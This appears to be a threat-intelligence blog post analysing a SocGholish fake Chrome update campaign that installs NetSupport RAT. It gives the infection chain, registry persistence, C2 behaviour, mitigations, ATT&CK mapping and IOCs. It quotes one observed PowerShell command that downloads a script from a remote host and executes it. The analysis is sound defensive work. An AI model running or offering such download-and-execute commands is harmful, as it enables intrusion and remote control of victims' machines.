New Drive-by Download Campaign Spying on Users
This malware framework uses several social engineering themes that impersonate browser and program updates such as Chrome/Firefox, Flash Player, and Microsoft Teams.
Being infected with SocGholish may result in the deployment of malware such as Cobalt Strike framework, ransomware, Information Stealers, RATs, etc.
The below figure depicts the infection chain used by the SocGholish framework.
Figure 1 – Infection chain of SocGholish
The infection chain begins once a user visits a compromised website that contains an injected HTML code which redirects them to a fake Chrome browser page to lure them into updating their Chrome application.
Once the user clicks the “Update” button on the fake page, an archive file named “Сhrome.Updаte.zip” is downloaded and saved in the “Downloads” folder.
The below figure shows a fake Chrome browser update page and the downloaded zip archive file.
- “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -w h -c “iwr -usebasicparsing hxxp://aeoi[.]pl/15.ico |iex”
The new PowerShell script contains Base64-encoded streams which are decoded using [System.Convert]::FromBase64String method, and then performs gzip decompression operation using the [System.IO.Compression.CompressionMode]::Decompress method as shown below.
This decompressed Base64-decoded data contains the embedded payloads and contains code to drop the “NetSupport RAT” application named “whost.exe” with its supporting files saved under the %Appdata% directory, after which “whost.exe” is executed. The below figure shows the NetSupport client application along with its associated files.
After dropping the payload, the PowerShell script creates a run entry to ensure the executable “whost.exe” starts whenever the user logs onto the machine.
The below figure shows the registry key created to establish persistence of the NetSupport client “whost.exe”.
NetSupport Manager RAT
NetSupport Manager is a commercially available RAT (Remote Administration Tool), typically used for legitimate reasons that gives administrators remote access to user’s computers. However, the legitimate application can also be abused by TAs to gain unauthorized access to compromised systems.
Upon execution of the “NetSupport RAT”, it attempts to identify the victim’s geo-location by contacting the following URL:
We also observed that the installed RAT sends victim information in an encrypted format with POST requests to the following Command-and-Control server URL:
The figure below shows the network communication established to send the victim’s information to the TA’s C&C server.
After compromising a victim machine, the TAs can perform several malicious activities such as monitoring the victim’s system, transferring files, launching applications, identifying the system location, remotely retrieving inventory and system information, etc.
Threat Actors use various techniques to deploy their malicious payloads into victim systems. Over the course of our research, we observed that TAs using Fake Browser Update (SocGholish) to deliver the NetSupport RAT.
While downloading files from internet, users should confirm whether the downloaded content originated from a legitimate source and not from any suspicious sites. Software applications such as web browsers will typically notify users about updates within the application itself and avoid updates via any third-party websites.
Cyble Research & Intelligence Labs actively monitors new malicious campaigns and keep our readers updated with our latest findings.
- Refrain from opening untrusted links and email attachments without first verifying their authenticity.
- Educate employees in terms of protecting themselves from threats like phishing’s/untrusted URLs.
- Avoid downloading files from unknown websites.
- Use strong passwords and enforce multi-factor authentication wherever possible.
- Turn on the automatic software update feature on your computer, mobile, and other connected devices.
- Use a reputed antivirus and internet security software package on your connected devices, including PC, laptop, and mobile.
- Block URLs that could spread the malware, e.g., Torrent/Warez.
- Monitor the beacon on the network level to block data exfiltration by malware or TAs.
- Enable Data Loss Prevention (DLP) Solutions on the employees’ systems.
MITRE ATT&CK® Techniques
|Tactic||Technique ID||Technique Name|
|Initial Access||T1189||Drive-by Compromise|
|User Execution |
|Persistence||T1547||Registry Run Keys / Startup Folder|
|Privilege Escalation||T1574 |
|DLL Side-Loading |
|Obfuscated Files or Information |
Deobfuscate/Decode Files or Information
|Discovery||T1082||System Information Discovery|
|Command and Control||T1219|
|Remote Access Software |
Ingress Tool Transfer
Indicators of Compromise (IOCs)
|Archive file “Сhrome.Updаte.zip”|
|Archive file “Сhrome.Updаte.zip”|